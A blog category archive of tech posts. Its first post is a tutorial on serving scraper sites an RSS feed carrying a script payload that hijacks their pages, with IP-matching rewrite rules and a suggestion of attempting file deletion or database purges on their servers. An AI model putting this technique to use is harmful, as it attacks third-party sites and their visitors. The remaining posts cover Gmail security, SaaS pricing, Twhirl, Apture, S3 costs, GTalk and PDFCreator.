Category Archives: Tools

Poisoned RSS: An approach to dealing with aggressive feed thieves

Ever since the first RSS feeds were published there has been the problem of nasty, spammy people sucking up those feeds and reposting the content on their own nasty, spammy blogs (splogs). There are many approaches to dealing with the problem – friendly (emailing to ask them to take the content down and desist), legal (eg DMCA, but that only works for US-based sites), technical (eg blocking based on blacklists, but that is a pain) and editorial (eg short-form RSS, which sucks).

One way not to deal with the problem is to remove your RSS feeds altogether – which, it is rumored, local blog network Gothamist (home of SFist) is considering doing in order to concentrate on the distribution of their proprietary content apps instead. I’m confident that is an extremely flawed strategy, but I digress.

My girlfriend Violet Blue runs a highly successful blog (warning: very NSFW content), which suffers immensely from splogs republishing her content without permission. As I look after her server and the technical operations for her empire of sites, I decided to see if I could help solve this problem in a different way.

What I am about to go through is a tutorial on how you can really try to hurt someone who is leeching your RSS feed – to the extent that it damages and potentially destroys their splog operation. I am not a lawyer, but I do not believe any of what I am about to go through is illegal – although I’ll admit that it is naughty.

In a nutshell…

…what we are going to do is intercept the requests from the target’s server for our RSS feed and divert them to a ‘poisoned’ RSS feed that contains not only content warnings but also JavaScript that, when rendered on their website, will take over their page, rendering their site and its advertising useless for anyone who comes to visit. If you wanted to go further, you could also use this method to try to execute shell commands on their server, although at that point things become legally murky and ethically questionable.

This tutorial assumes you have some basic site admin skills, can access your logs and can set a .htaccess file.

So here goes…

Step 1: Identify your target

Chances are you’ve discovered someone republishing your content via a Google search or a trackback from the splog to your site. The first thing to do is to get the IP address of the site. Most splogs will request your feed from the same server as they serve their webpages from, so this makes it easy to identify them when they come to visit your site to pull down your RSS feed. Throughout this tutorial I’m going to assume that my target has the IP address 123.123.123.123.

Step 2: Search your logs

Search your logs for any access to your site by this ip address. You might want to try:

$ grep "123.123.123.123" /var/log/access_log

where 123.123.123.123 is the IP address of the splog and /var/log/access_log is the path + filename of your web server’s access log.

Hopefully you will have found some matches:

123.123.123.123 - - [16/Jan/2011:14:03:51 -0500] "GET /feed HTTP/1.1" 200 - "" "Mozilla/4.8 [en] (Windows NT 6.0; U) (880701279)"
123.123.123.123 - - [16/Jan/2011:15:57:13 -0500] "GET /feed HTTP/1.1" 200 - "" "Mozilla/4.8 [en] (Windows NT 6.0; U) (1416539927)"
123.123.123.123 - - [16/Jan/2011:20:31:40 -0500] "GET /feed HTTP/1.1" 200 - "" "Mozilla/4.8 [en] (Windows NT 6.0; U) (686799288)"
123.123.123.123 - - [16/Jan/2011:23:52:38 -0500] "GET /feed HTTP/1.1" 200 - "" "Mozilla/4.8 [en] (Windows NT 6.0; U) (2099013304)"
123.123.123.123 - - [17/Jan/2011:02:26:34 -0500] "GET /feed HTTP/1.1" 200 - "" "Mozilla/4.8 [en] (Windows NT 6.0; U) (1475562814)"
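If the splog is hiding among a lot of traffic, a few lines of script can tally feed requests per IP for you. A minimal sketch in Python, assuming the common/combined Apache log format – the sample lines and the /feed path are illustrative, so adjust them for your own server:

```python
import re
from collections import Counter

# Match the client IP at the start of a common/combined-format log line
# for GET requests to /feed. Adjust the path for your own feed URL.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET /feed ')

def feed_requesters(lines):
    """Count feed fetches per client IP."""
    hits = Counter()
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            hits[m.group(1)] += 1
    return hits

# Illustrative sample; a persistent scraper shows up as a high, regular count.
sample = [
    '123.123.123.123 - - [16/Jan/2011:14:03:51 -0500] "GET /feed HTTP/1.1" 200 - "" "Mozilla/4.8"',
    '123.123.123.123 - - [16/Jan/2011:15:57:13 -0500] "GET /feed HTTP/1.1" 200 - "" "Mozilla/4.8"',
    '98.76.54.32 - - [16/Jan/2011:16:00:00 -0500] "GET /about HTTP/1.1" 200 - "" "Mozilla/5.0"',
]
print(feed_requesters(sample))
```

Feed it your real log (for example via `open('/var/log/access_log')`) and the splog’s IP should stand out immediately.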

It’s worth pointing out this will not work if you point your RSS feeds directly at a 3rd-party site like Feedburner, because the request from the splog never reaches your server. At that point, sadly, there is little you can do, as Google (Feedburner’s parent company) does not give you control to serve different content to arbitrary IP addresses. If you want to use a service like Feedburner, consider publicly offering an RSS URL on your server that 302-redirects to Feedburner – achieving the same result while maintaining control of requests.
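That redirect takes only a couple of mod_rewrite lines in your .htaccess. A sketch, assuming Apache and a placeholder Feedburner feed name (substitute your own):

```apache
# Offer /feed publicly, but 302-redirect readers on to Feedburner.
# Because the 302 is temporary, every request still hits your server first,
# so you keep the ability to treat individual IP addresses differently.
RewriteEngine On
RewriteRule ^feed$ http://feeds.feedburner.com/yourfeedname [R=302,L]
```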

Step 3: Build the poisoned RSS feed

We are going to create a separate RSS feed that we will redirect the splog’s requests to. If they are creating a new page/blog post for every item in your feed, our new poisoned RSS feed will force their server to generate pages containing what we want to say.

At this point you need to decide how far you want to take things:

  • Display a content warning explaining that they are reproducing your content without permission and you are unhappy about it
  • Display images from TubGirl and other Shock Sites
  • Hijack their page’s DOM and redisplay the page. Anyone accessing their site will only see your content, with all adverts and other links removed.
  • Attempt to run commands on their server – eg attempt to delete files, elevate user permissions, purge the database, etc.

For my situation I decided to go for the first 3.

To create the poisoned RSS feed, you could save out your own current RSS feed and use that as a template. Replace the obvious text in each item with what you would like to say and save it back to your server. Alternatively you could just use my poisoned PHP script on Github.

My script makes the request’s IP address and other HTTP details appear in the footer of each page, along with a tracking string so you can search Google for any other places they are publishing to. It will also try to inject JavaScript that manipulates the DOM so that when they (or anyone else) visit their site, only your message will appear. Finally, the script outputs 10 identical items, each with a random GUID, so that more pages are created on each revisit because the splog thinks every item is new.
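The actual script is PHP, but the core trick – ten identical items, each carrying an escaped script payload and a fresh random GUID – can be sketched in a few lines of Python (the feed text and payload here are stand-ins, not the real script):

```python
import uuid
from xml.sax.saxutils import escape

# Stand-in payload: if a splog unescapes the description and inlines it,
# this script runs in their page and replaces their content.
PAYLOAD = '<script>document.body.innerHTML = "This content was stolen.";</script>'

def poisoned_feed(title="Poisoned feed", n_items=10):
    """Emit an RSS 2.0 feed of n identical items, each with a fresh random
    GUID so the splog treats every item as new on every fetch."""
    items = []
    for _ in range(n_items):
        guid = uuid.uuid4().hex
        items.append(
            '<item><title>Content warning</title>'
            '<guid isPermaLink="false">%s</guid>'
            '<description>%s</description></item>'
            % (guid, escape('This post was reproduced without permission. ' + PAYLOAD))
        )
    return ('<?xml version="1.0"?><rss version="2.0"><channel>'
            '<title>%s</title>%s</channel></rss>' % (escape(title), ''.join(items)))
```

Note that the payload is escaped, so the feed itself stays valid XML; it only becomes live markup if the splog unescapes it into one of its pages.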

As a bonus you can also set it to email you when someone accesses the poisoned feed.

Step 4: Intercept the splog request

The simplest way to intercept the splog’s requests for your RSS feed and divert them to the poisoned feed is to put the following at the top of your .htaccess file:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REMOTE_ADDR} ^123\.123\.123\.123$
RewriteRule ^(.*)$ /poisoned-feed.php [L]
</IfModule>

Again, 123.123.123.123 is the splog’s IP address, and the RewriteRule target is the path to your poisoned feed script.

Step 5: Sit back and wait

You can now sit back and wait until the splog requests your content again, at which point it will be served your poisoned feed and will go on to ingest the poisoned content.

What will happen is that the splog will take each of the items in the feed and convert them into individual pages. Your poisoned content will be ingested into their pages where, if they are not escaping characters properly, the JavaScript and other code will be executed when an end-user visits the page.
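To see why the escaping matters, here is a toy illustration (not any real splog’s code) of what naive ingestion looks like:

```python
from xml.sax.saxutils import unescape

# A naive scraper unescapes the feed item's description and drops it
# straight into its page template, so any <script> the description
# carried ends up live in the served page.
item_description = 'Stolen post &lt;script&gt;alert("poisoned")&lt;/script&gt;'
page = '<html><body>%s</body></html>' % unescape(item_description)
print('<script>' in page)  # True: the payload survived into the page
```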

My GMail password scares me with its power!

Google’s GMail blog has some “handy” advice on how to pick a good password to protect your email account.

Don’t use dictionary words, use mixed case, your eldest kid’s name is a bad choice, etc etc. Yeah that’s great.

But the much bigger security issue, I fear, is that my GMail username & password are also the username & password for:

  • My calendar (Google Calendar)
  • My confidential documents (Google Docs)
  • My credit card (Google Checkout)
  • My website’s analytics (Google Analytics)
  • My RSS feed admin (Feedburner)
  • My phone number, voicemail, IMs (Google Voice + GTalk)
  • Some experimental projects (App Engine)
  • My photos and videos (Picasa and YouTube)
  • + more (see your list of Google services you use)

Given the legitimate places you need to put your username and password in order to access your email (ie your email client, which might be sending it in the clear each time it fetches mail), is it too much to rely on its security and integrity for all these other ancillary Google services?

I am a strong believer that you shouldn’t give your Google username and password to ANYONE for this reason. It pains me to have to give it to RIM but it’s the only way they can push email to my Blackberry.

Security through segregation

It’s really about time Google separated GMail, and perhaps GTalk, authentication from the rest of their properties. At the very least I’d like to see the ability to create a separate password for IMAP/POP access that I can enter into my email client and give to RIM that doesn’t give access to the rest of my Google Account.

However, as Google becomes an ever more vital and relied-upon part of our online workflow (see how many services I use, above), I wonder whether there would be value in offering an optional RSA-style keyfob to help protect access – perhaps for a $20-$50/year fee. I know I would pay, and that PayPal have been offering a product like this for some time at $5 a fob.

WOW it’s expensive to use Freshbooks and Harvest at scale

I don’t subscribe to the “everything must be free” meme that basically ignores the intrinsic value a product or service gives you. If a product or service provides me with real value then I am happy to pay for it – either through purchase/subscription or by being monetized via ads/usage data, etc.

But I’m surprised at just how expensive some of the darlings of the Web2.0 SaaS era work out to be when used at scale.

Like a crack dealer giving you the first hit free, most of them offer a “free” plan that is clearly designed to become severely limiting the moment things begin to work out for you and your business takes off. There’s nothing new about this way of doing business, but have you seen just how much your hits cost once you get addicted?

Two examples particularly on my mind are Freshbooks and Harvest. Both are great products, built by great people I have had the honor of meeting over the years.

Time tracking service Harvest starts out at $12/month ($144/year) for a single user, but at Swordfish Corp there are now three of us, requiring the 5-user plan @ $40/month ($480/year). Not much change out of $500 – which seems pretty expensive for a year of time tracking.

Invoicing service Freshbooks has a free and slightly limited option for individuals, but a company of three would need the 3-staff plan @ $39/month ($468/year) – and I notice that once we take on a fourth person we would need to skip to the 10-staff plan @ a jaw-dropping $89/month ($1,068/year).
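The annual figures above are just the monthly prices multiplied out – a quick sanity check (plan prices as quoted at the time of writing):

```python
# Annualize the monthly plan prices quoted above.
plans_per_month = {
    'Harvest solo': 12,
    'Harvest 5-user': 40,
    'Freshbooks 3-staff': 39,
    'Freshbooks 10-staff': 89,
}
plans_per_year = {name: price * 12 for name, price in plans_per_month.items()}
print(plans_per_year)
```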

When researching these plans, I’m also considering what my future business needs are. With services like these, I want to pick providers who can scale with me as my business (hopefully) grows.

I should point out that one way of getting around this is to share accounts, but for time tracking this doesn’t work and for invoicing, everyone at Swordfish does their own invoicing on their client accounts.

Now, I’m not against paying for these kinds of services in general. Between myself (personally) and Swordfish, I have paid subscriptions to NolaPro (Hosted accounts package), Shoeboxed (receipt and business card data entry) and Flickr.

And I’m not saying that it’s not worth $480 a year to the company for good time tracking. I’m just saying I’m not sure a service like Harvest is offering me $480 of value a year over and above using a simple Google Spreadsheet created in 20 minutes, for free, and shared within the company.

I’m a fan of the Freemium model, but if it’s going to work the numbers can’t increase exponentially as your usage increases – it’s not fair (a form of bait-&-switch on the free accounts) and it’s also not reflective of the true cost of SaaS, where the per-user cost should flatten out at scale.

Join ‘Team Seesmic-Twhirl’ beta tester group and get exclusive preview access

Twhirl logo

Last week we launched a totally new version of the Seesmic website – with a much improved interface on the front end that builds upon 2008’s rewrite of the back-end. The new version has got some great reviews and I know the whole team is very pleased with the positive feedback it’s received. Do check it out if you haven’t tried Seesmic recently.

This week our concentration has moved to Twhirl, the Twitter (+ Seesmic, FriendFeed and Identi.ca) client we produce. Once again there’s lots of buzz around some exciting new features in the forthcoming version, including:

  • The gathering under the “replies tab” of all tweets that include @yourusername, not just when it’s added at the start of a tweet
  • Integration that posts your status messages from Twhirl to Facebook, MySpace, LinkedIn, WordPress and other sites
  • One-click recording of new and reply Seesmic videos straight from Twhirl
  • Saved searches, to keep track of the discussion of your favorite terms across the twittersphere
  • More URL-shortening providers

I’ve been using the beta version of Twhirl for a few days now and I have to say it’s excellent. We’ll be releasing the new version of Twhirl soon, but in the meantime you can get immediate access to the preview version by joining our brand new beta test group called “Team Seesmic-Twhirl”.

You can find out more, including where to sign up, on Loic’s blog.

Apture: elegantly adding context to your site

“Wow, that’s really really slick!”

That was my reaction when Tristan first showed me a demo of Apture (which just opened for signups, if you want to add it to your blog or website).

We’d met a few times previously and he’d been teasing with hints about the product he was working on – but refused to show me anything, or even give me any detail about what he and his fellow co-founders were really up to.

All I knew was that we shared a common interest in both grassroots and mainstream media, and in the importance of innovation given the nature of the content often being communicated. We’d spent several meetings discussing all sorts of interesting stuff – from the way the media is often the last resort for keeping governments and business in check, and the need for an informed society, through to the power of building products with a platform-orientated architecture.

Very much a meeting of minds – and so when I finally got to experience Apture, I was delighted that it too was at the intersection of so many of my favorite topics. I’m also proud to say that I am a member of Apture’s advisory board.

Welcome to Apture

For me, Apture is about bringing light-touch context and background to topics within the page you are looking at. In essence, it provides a simple framework to attach background context and ancillary content to subjects mentioned in your page – all without interrupting the flow of your reading and, crucially, without leaving the page you are looking at. In fact, you have already experienced Apture! (unless you are reading this in a feed reader, in which case check out the page on my blog)

When I saw the first demo of the product, what excited me the most was the implementation – which I think is slick and impressive. The thoughtful UI makes the product simple and intuitive to use, backed up by some pretty tight code that makes the seamless experience possible.

Elegantly handling off-site links and embeddable media

From my days working at the BBC News Website, I’ve seen first hand the importance of providing background information on the subjects discussed in a news story. Not everyone follows the news agenda as deeply as others, and providing a bit of context can really make the difference and ensure the reader is able to engage with the latest developments being written about.

I’d also seen examples of how the BBC had got some of its interface and style guidelines wrong – like not using hyperlinks inside body content, and completely missing the early emergence of embeddable media (arguably pioneered by YouTube). I have to hold my hands up to these as much as anyone else at the Beeb, as I was there at the time these things took off.

On both counts Apture solves these problems in an elegant way.

The concern around marking up body content with hyperlinks is about usability. When the user clicks on them she is taken to a new destination page mid-flow of her reading. Apture solves this concern by providing the essence of the page you want to link to in an easily manipulated floating window that the user can quickly digest and either get back to the copy or potentially elect to click through to a fuller page of content. The point is that the reader makes an informed decision whether to jump to a new page or continue reading. Apture also lets the reader position the window around the content so that they can interact with it later on when they are ready.

Another key part of this is the selection of the media you use to provide that background to your post. Apture helps you there too – by recommending relevant content from across numerous repositories on the internet – including Wikipedia, Flickr and IMDB. Finally, it reformats these pages so that the pertinent information is displayed clearly inside the Apture window that is associated with your subject.

Apture also provides a unique way to embed media, and can even handle certain types of media asset simply by noticing you are linking out to a photograph or a video in your piece.

Open for business

Having been in closed beta for some months, this week Apture was released to the public. Getting Apture on your site is really simple (just a line of javascript or the installation of a WordPress Plugin) and of course it is totally free.

You can also take a tour of the product and see more demos of it in action.

New look for Google Analytics

The rest of us only got a short glimpse of the veritable eye candy that was MeasureMap before it was cruelly snatched away by Google into perpetual closed beta oblivion.

There’s nothing to suggest that the service will ever be open to new users… and this has been further compounded by the release of a new interface for Google Analytics, MeasureMap’s older (and slightly crustier) brother.

Screenshot of Google Analytics

From what I can see, Google Analytics has been slowly bathed in the GUI-goodness of MeasureMap, with some of it marinating nicely into the more established product. Such evidence confirms my suspicions that MeasureMap’s acquisition was made more for its interface fu (along with its fu master, Jeffrey Veen) than anything else. Clearly the intention has been to improve Google’s main stats offering rather than launch a secondary service (such behavior got Yahoo! into a bit of trouble).

[via MarketingPilgrim]

Amazon S3 cost savings and the future of utility computing services

Amazon have been doing some amazing things in the utility computing sector with S3 (storage) and EC2 (virtual servers).

It’s touted as an economical platform to run your start-up/company/website/whatever from, as it makes use of the spare capacity Amazon owns for its e-commerce platform (so, er, what happens over Christmas when that platform is at its peak?).

I think it very much depends on what you intend to use EC2 and S3 for, but photo sharing site Smugmug has been a champion of S3 for some time – claiming it is saving them over $500k in the first year. At this point in time they only use Amazon S3 for storage of the images.

Michael Arrington called them on their numbers during Web2.0 Summit, and so the Smugmuggers have come back with some real numbers on their blog. The conclusions are:

  • Total amount NOT spent over the last 7 months: $423,686 [by not buying IDE disks, RAID controllers and single CPU servers for their SAN]
  • Total amount spent on S3: $84,255.25
  • Total savings: $339,430.75
  • That works out to $48,490 / month, which is $581,881 per year. Remember, though, our rate of growth is high, so over the remaining 5 months, the monthly savings will be even greater.
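Their headline figures do reconcile, for what it’s worth – a quick check of the arithmetic above:

```python
# Reconcile Smugmug's published figures (quoted above) over the 7 months.
not_spent = 423_686        # hardware they did not have to buy
s3_bill = 84_255.25        # paid to Amazon S3 over the same period
savings = not_spent - s3_bill
per_month = savings / 7
per_year = per_month * 12
print(savings, round(per_month), round(per_year))
```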

I was talking to an interesting start-up on Friday who were offering a product that could essentially be leveraged as a ‘commodity’/’utility’ computing product. I can’t really say what their vertical is, but they were marketing it (somewhat understandably) with a specific implementation so that it could be sold as a turn-key product. Their business plan was based on charging a percentage of the revenue their product generated.

I felt that by wrapping an interesting utility product into a single means of implementation they were shutting many doors to ways their product could be used in other areas. My overarching point to them was that what Amazon is really trailblazing here is the pricing model – and rather than charging based on the somewhat fuzzy impact their product had on revenue (which could easily be zero or negative, not just positive – and potentially off-putting, IMHO, as it requires companies that might be private to disclose revenues, etc.) they could charge based on usage: $0.10 per 1,000 calls to their service, and so on.
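Metered pricing like that is also trivial to implement and reason about. A toy sketch, using the $0.10-per-1,000-calls rate as an example (everything else here is made up):

```python
# Toy usage-based billing at $0.10 per 1,000 API calls.
RATE_PER_1000_CALLS = 0.10

def monthly_bill(calls):
    """Dollars owed for a month's worth of API calls."""
    return calls / 1000 * RATE_PER_1000_CALLS

print(round(monthly_bill(1_000), 2))    # a thousand calls: roughly $0.10
print(round(monthly_bill(250_000), 2))  # a quarter million calls: roughly $25
```

The appeal of this model is exactly that it needs no knowledge of the customer’s revenue – the meter is the whole contract.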

EC2, Amazon’s flexible virtual server product, is in many ways even more fascinating. I’m not convinced it’s the cheapest way to run a server continually – not over a 12-month term at least. And its performance over the Christmas period is a bit of an unknown. But the ability to suddenly double or triple the number of instances of an application server, especially for a short time during a serving peak, has real, definite value. The emergence of ways to automate the ramping-up and ramping-down of service over the course of a day/week/month cycle is particularly exciting.

It’s definitely an interesting area and I’m curious to see how the industry adopts it.

Your own utility computing service?

My final point on all this, I guess, is to look to see whether you have a potential utility computing product in your inventory or as part of your start-up. Even if it’s not your company’s core product it might be something that’s part of your platform. Amazon is still a book and CD retailer after all, and it’s just utilizing affordances in its serving platform.

Anyway, the point is not only that you can offer something, but that you can easily monetize it in perhaps the most scalable and lowest-risk way – pay as you use. So start thinking about whether you have something like gateways (eg API-to-SMS), data processing (sorting, ranking, etc) or database capacity.

Boring update to GTalk ships

Google have launched an upgrade to GTalk – offering pretty bog-standard ancillary IM features:

  • File-sharing
  • Voicemail
  • Music status


I like using GTalk because it’s the only mainstream IM gateway based on the open-source and interoperable Jabber/XMPP format.  It’s the yin to the yang of my use of Skype (which is proprietary and closed).

Sure, that’s a bit of a geeky reason to use it, but I think the lack of interoperability between IM providers is laughable when all of the big names that run them are generally trying to be (/appear to be) ‘open’ everywhere else.

Supporting Google for choosing an open format when they created their own system is important to me.

However, these GTalk extensions are presumably extensions outside the Jabber/XMPP standard (hmm, maybe not file transfer – will investigate).  The existing ‘voice’ services certainly are, as the Jabber/XMPP standard doesn’t support VoIP.

The point is, I would have liked to have seen Google help to create extensions to the Jabber/XMPP standard to support these new functions, rather than laying proprietary functionality over the otherwise open spec.

I use Gaim for Windows (and Gaim on my Ubuntu Linux box), which supports Jabber/XMPP but obviously not these proprietary Google extensions – and as such this functionality will probably not be available to me anyway.

UPDATE: It’s not clear whether either the VoIP functionality or these new functions in today’s release are part of a future Jabber/XMPP spec. I’m going to investigate and report back to set the record straight. 🙂

Great free PDF creation tool for Windows

I just wanted to write a quick post to recommend a free (and open-source-ish) PDF creation tool I have discovered called PDFCreator.

In the past I’ve used the free services of PDFOnline, which emails you PDFs of files you upload to its server.

However PDFCreator offers you the same functionality by simply creating a virtual printer on your computer that saves out to PDF format.

I know a lot of people are already using tools like this, and that they are freely available (/pre-installed?) on Macs.  So sorry for being slow.

The app is described as ‘open-source’ in that the source code is available for download.  The PDF file format itself, however, isn’t open.

PDFCreator doesn’t put a watermark or similar imprint on the output PDF files, either.